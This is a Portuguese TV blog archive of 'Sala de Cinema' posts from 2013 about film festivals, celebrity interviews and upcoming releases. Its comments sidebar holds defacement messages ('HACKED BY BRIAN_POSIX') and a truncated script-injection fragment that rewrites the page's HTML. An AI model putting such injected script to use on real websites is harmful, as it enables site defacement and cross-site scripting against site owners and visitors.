Sala de Cinema @ 17:12

Sex, 24/05/13

A 66a edição do Festival de Cannes começa hoje e a sala de cinema do Mais Mulher vai lá estar.

 

Antecipamos alguns destaques daquele que continua a ser o maior festival de cinema do mundo.


Tags:


Sala de Cinema @ 18:31

Ter, 07/05/13

A jovem argumentista que trabalha para o projeto beActive, a produtora de “Collider” e “O Diária de Sofia”. Uma produtora que tem apostado em co-produções com o mercado britânico. Tem o curso de Comunicação Social e veio das beiras.

A Susana antes de se lançar no cinema foi supervisora de guiões para  telenovelas e séries juvenis. E esta quarta-feira revela-nos tudo sobre este seu último projeto, às 17:30 no Mais Mulher da SIC Mulher!

E se não viu. Veja o vídeo aqui!

 


Tags:


Sala de Cinema @ 18:30

Ter, 30/04/13

O Festival IndieLisboa acabou no passado fim de semana e encheu muitas sessões em Lisboa.  Cada vez mais, torna-se uma referência internacional e marca posição em conseguir fazer descobrir o que há de novo no cinema internacional.

 

Numa edição marcada pela forte produção portuguesa, a Associação Zero em Comportamento, entidade reguladora do festival está de parabéns.

 

Por isso não perca este Mais Mulher tão especial, às 17:30 de 1 de Maio na SIC Mulher!

E se não viu. Veja o vídeo aqui!

 


Tags:


Sala de Cinema @ 18:32

Ter, 23/04/13

“A Gailoa Dourada”/”La Cage Dourée”, de Ruben Alves, com Joaquim de Almeida e Rita Blanco.
Comédia sobre emigrantes portugueses em França dirigida por um luso-francês. O filme é uma imensa aposta comercial da todo-poderosa Pathé e visa descrever com humor e emoção uma família portuguesa típica nas suas diversas gerações.

Além de Almeida e Blanco, há ainda a participação de Maria Vieira. Em França estreia dia 25 de Abril e em Portugal no começo de Agosto. Um filme a não perder...

 

E ainda falaremos sobre as novas distribuidoras que podem vir a dinamizar a indústria cinematográfica. Sendo que em plena crise do mercado de cinema, novas distribuidoras apostam no cinema independente.
E falaremos também da nova sala IMAX em Lisboa, onde a qualidade de exibição atinge valores só antes sonhados!

 

Por isso já sabe, não perca o Mais Mulher desta quarta-feira, e fique a par de todas as novidades do mundo da 7ª arte.

E se não viu. Veja o video aqui!

 




Tags:


Sala de Cinema @ 18:31

Ter, 16/04/13

A propósito de “A Oportunidade da Minha Vida”, a comédia de Nicolas Cuche, a Sala de Cinema viajou até Paris e entrevistou o realizador. Trata-se de uma comédia onde um homem azarado tenta pôr término a uma maldição romântica. Um filme ligeiro pensado para esta Primavera.

 

E também neste Mais Mulher. Nuno Gonçalves estará presente, o diretor responsável pela Sala de Cinema Francês Zon Amoreiras, que há dois anos projeta apenas cinema francês. A sala tem sido um sucesso de estima surpreendente e “A Oportunidade da Minha Vida” é mais um filme a estrear lá esta semana.

 

E por todo este glamour Francês, e muito mais, não perca o Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

E se não viu. Veja o vídeo aqui!

 


Tags:


Sala de Cinema @ 18:31

Ter, 09/04/13

Na Sala de Cinema desta semana Rui Pedro Tendinha traz-nos a entrevista exclusiva a Rui Costa Reis entre outros ilustres convidados no famoso Chinese Man Theatre, em Hollywood, local onde estreou mundialmente o filme "Phantom Submarino Fantasma", uma produção portuguesa em Hollywood!

 

Mas não ficamos por aqui, também esta semana falamos das estreias mais aguardads e dos filmes que já estrearam!

 

"Os Amantes Passageiros", de Pedro Almodóvar.
A história de um atribulado voo entre  Madrid e a Cidade do México. Um voo com muito humor e sexo. Javier Camera é o protagonista neste regresso de Almodóvar às comédias.

 

E também "Red State", de Kevin Smith.
Um olhar impedioso e brutal sobre um culto religioso americano. Três rapazes são apanhados por uma seita com ódio expresso aos homossexuais. Do realizador de "Dogma" e "Clerks".

 

Por isso já sabe, fica a par de todas as novidades do mundo da 7º arte, com o Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

 

E se não viu o vídeo. Veja o vídeo aqui!

 






Tags:


Sala de Cinema @ 18:31

Ter, 02/04/13

O Sala de Cinema foi a Hollywood entrevistar dois vultos do cinema americano, Ed Harris e David Duchovny. Muito simpáticos, os atores falaram de “Phatom”, filme que estreia em Portugal dia 18.

Uma história de suspense sobre um submarino russo que é tomado por agentes do KGB. Uma produção independente de Rui Costa Reis e Ricardo Costa Reis. Harris e Duchovny falaram destes produtores luso-angolanos e abordam as suas personagens russas, bem como facto de terem filmado num verdadeiro submarino do tempo da Guerra Fria.

 

Esta semana trazemos-lhe uma seleção de filmes primaveril!

Ora veja:

 

"Os Ilusionistas", de Louis Leterrier, com Jesse Eisenberg e Michael Caine.
O FBI anda à procura de um grupo de ilusionistas que assalta bancos. Um divertimento em formato de thriller para a família.

"A Ressaca - Parte 3", de Todd Philips, com Bradley Cooper e Ed Helms.
Terceira parte de um dos conceitos mais bem sucedidos da comédia americana. Prevê-se grande êxito de bilheteira.


"Além da Escuridão - Star Trek", de JJ Abrams, com Chris Pine.
Segunda parte da nova vida em cinema da mítica série de ficção-científica. Consta que visualmente é a absolutamente arrebatador.

"Mud", de Jeff Nichols ,com Matthew McCounaghey.
Um fugitivo é ajudado por dois rapazes numa fuga desesperada. Um dos mais esperados filmes do ano.

"The Blin Ring", de Sofia Coppola, com Emma Watson.
Dissertação acerca do culto das celebridades. O regresso de Sofia Coppola depois de "Somewhere" ou "Algures". Baseado em acontecimentos verdadeiros.

 

Curiosa!?! Então não perca e muitas outras novidades do mundo da 7ª arte com Rui Pedro Tendinha.

No Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




Tags:


Sala de Cinema @ 18:31

Ter, 26/03/13

O ator vencedor do Óscar esteve em Lisboa para a apresentação de “Comboio Noturno para Lisboa”, de Bille August, já em exibição. Um projeto franco-alemão com dinheiro também português. A adaptação do famoso bestseller de Pascal Mercier.

Uma história de um professor suíço que chega a Portugal depois de achar acidentalmente um romance escrito por Amadeu, um jovem médico que foi uma figura fulcral na luta contra a ditadura fascista portuguesa nos anos 70. Uma interpretação de Jeremy Irons que vai dividir opiniões. Na Sala de Cinema, o ator confessou a Rui Pedro Tendinha ser fã da luz de Lisboa e até falou ainda da crise económica portuguesa.

 

O IndieLisboa 2013 começa já no próximo dia 18 de Abril e vai até 28. Deixamos aqui cinco apostas da Sala de Cinema de um festival que este ano celebra 10 anos e que muda o figurino: menos retrospetivas e uma nova direção, desta vez sem a presença de Rui Pereira.

- “Um Fim do Mundo”, de Pedro Pinho.
Um drama no limite do real sobre adolescentes da Bela Vista, o mais problemático dos bairros sociais de Setúbal. Esteve no festival de Berlim.

- “Paradise-Love”, de Urlich Seidl.
Primeira parte de uma trilogia deste cineasta austríaco. Este primeiro tomo conta-nos a história de uma senhora austríaca que decide arriscar e fazer umas férias sexuais num país africano.

- “É o Amor”, de João Canijo.
Depois de já ter tido a sua antestreia em Vila do Conde, este cruzamento entre ficção e documentário leva-nos até ao dia-a-dia de uma comunidade de pescadores nas Caxinas, Vila do Conde. Estreia logo a seguir no circuito comercial.

- “Before Midnight”, de Ricard Linklater.
Julie Delpy e Ethan Hawke voltam a protagonizar a história de um casal separado por um continente. Depois de “Antes de Anoitecer” e “Antes do Amanhecer”, o capítulo final deste romance passa-se na Grécia.

- “No”, de Pablo Larrain.
O cinema chileno tem honras de abertura do festival. Gael Garcia Bernal é o homem que manipulou uma campanha anti-ditadura de Pinochet em plenos anos 80.

 

Poupe dinheiro
“GI Joe – Retaliação”, de Jon Chu (ZON), estreia quinta-feira.
Bruce Willis e Dwayne Johnson são as estrelas maiores desta sequela de G.I. JOE. Agora percebe-se porque razão esteve na gaveta um ano. Um dos piores filmes de ação da História de Hollywood. Um insulto ao espetador, onde a comédia surge de forma involuntária.

 

Não perca esta quarta-feira, às 17:30 na SIC MUlher!

 

E se não viu. Veja o vídeo aqui!

 





Tags:


Sala de Cinema @ 18:31

Ter, 19/03/13

A propósito de “Irmã “, o seu mais recente filme, o sala de cinema viajou ate Paris e entrevistou Ursula Meier, a cineasta Suíça revelada em Home. Nesta conversa ela explicou o seu método de encontrar a sua verdade de cinema. O filme aborda um caso social de dois irmãos que vivem sós e à margem das convenções sociais. Irmã esteve em competição no festival de Berlim.

- A realizadora está esta semana em Lisboa no âmbito do festival da francofonia!
- A vedeta do filme é Lea Seydoux, a estrela de Meia-noite em Paris e o ultimo Missão Impossível ...


Estreia na proxima semana, dia 28 - "Terra Prometida", de gus Van sant ( Zon), com matt Damon.


Drama com mensagem ecológica, este regresso à realização do cineasta de "O Bom Rebelde" mostra-nos como a América rural ê confrontada com a ganância das grandes corporações. Um filme para provocar uma discussão sobre os métodos de recolha do gás natural.


Antestreia da semana - "The Company We Keep"/ "Regra de silencio", de Robert Redford, com Robert Redford e Susan Sarandon(Zon).


Estreia em abril este filme de perseguição sobre a fuga de um ex-membro de uma célula radical dos anos 60 que procura provar ao FBI que não é culpado de um ato de terrorismo. Seguramente um dos acontecimentos da próxima Primavera!

 

A Figura da semana é Alexander Skarsgard.

 

O actor sueco já é um dos reis de Hollywood. Conhecido pela sua participação na série "True Blood", acabou de assinar contrato para ser o novo "Tarzan", o novo filme de David Yates. Vai também ser visto em "Hidden", um thriller sobre uma epidemia, e é considerado um dos maiores sex-symbols do momento.

Já foi vilão em "Cães de Palha" e em breve vai contracenar com Julianne Moore em "What Maisie Knew".

 

Por isso já sabe! Não perca estas estreias no Mais MUlher desta quarta-feira, com Rui Pedro Tendinha, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




Tags:


Sala de Cinema @ 18:31

Ter, 12/03/13

Entrevista a Jason Bateman e Melissa McCarthy

As estrelas de “Vigarista à Vista”, que estreia esta quinta-feira, foram entrevistadas em Londres por Rui Pedro Tendinha. O ator e produtor Jason Bateman, conhecido de filmes como “Juno” e “A Troca” fez par com a nova estrela da comédia americana, Melissa McCartht, ainda há pouco tempo vista em “The Bridesmaid” e a série “Mickey & Mallory”. Uma entrevista hilariante a dois, onde ambas as estrelas de Hollywood contam tudo sobre a comédia número 1 em Hollywood.

- sobre ele: ficou famoso numa sequela de TEEN WOLF e depois consagrou-se na televisão com ARRESTED DEVELOPMENT. Em off disse que ainda há hipótese dessa série transforma-se em cinema
- sobre ela: é considerada por muitos a mulher mais cómica do mundo. Odiada por alguns por fazer publicidade à obesidade. Mostrou todo o seu talento em AGUENTA-TE AOS 40 e foi já nomeada ao Oscar de atriz de suporte em BRIDESMAIDS- A MELHOR DESPEDIDA DE SOLTEIRA.

(sugestao pivot)
E nesta Sala de cinema viajamos até Londres onde o Rui Pedro Tendinha esteve à conversa com o casal do momento: os cómicos Melissa McCarthy e Jason Bateman, estrelas da comédia VIGARISTA À VISTA, uma historia de golpes e contragolpes em formato de road movie. Uma entrevista divertida e que nos desvenda que estas celebridades de Holywood têm uma inegável química humorística.

.....
muito rápido):

News:

Festa do Cinema italiano 8 1/5

Mais uma vez Lisboa recebe a festa do cinema italiano. Mais uma oportunidade para revelar o novo cinema italiano. Este ano, destaca-se a secção que homenageia os westerns spaghetis: Mani in alto.
Uma edição de 20 a 28 março em Lisboa no cinema são jorge e depois segue para outras cidades do país. O convidado é o consagrado cineasta Marco Tullio Giordana.

A sessão de abertura traz ao Cinema São Jorge Marco Tullio Giordana, que vem a 8 ½ Festa do Cinema Italiano apresentar o novo filme Romanzo di una strage, no dia 21, às 21h30, na sala Manoel de Oliveira. O realizador do filme A Melhor Juventude volta a contar a história de Itália num dos filmes mais premiados em festivais internacionais

Festival de cinema Luso de Genebra

Um grupo de emigrantes na Suíça prepara em Genebra a primeira edição de um festival de cinema de língua portuguesa. É já em Agosto e vamos poder ver cinema português em todos os formatos: da longa à curta, passando pelo documentário.

Estreias - 14 março

“A Última Vez Que Vi Macau”, de João Pedro Rodrigues e João Rui Guerra da Mata.
Depois do sucesso nos festivais internacionais, estreia finalmente aquele que poderá ser o grande filme português do ano. Um olhar pelas memórias de Macau numa história que narra a aproximação de um apocalipse.

A Figura da Semana

Alexander Skarsgard
O ator sueco já é um dos reis de Hollywood. Conhecido pela sua participação na série “True Blood”, acabou de assinar contrato para ser o novo “Tarzan”, o novo filme de David Yates. Vai também ser visto em “Hidden”, thriller sobre uma epidemia e é considerado um dos maiores sex-symbols do momento. Já foi vilão em “Cães de Palha” e em breve contracena com Julianne Moore em “What Maisie Knew”.

 

Curiosa!?!

 

Então não perca o Mais Mulher desta quarta-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO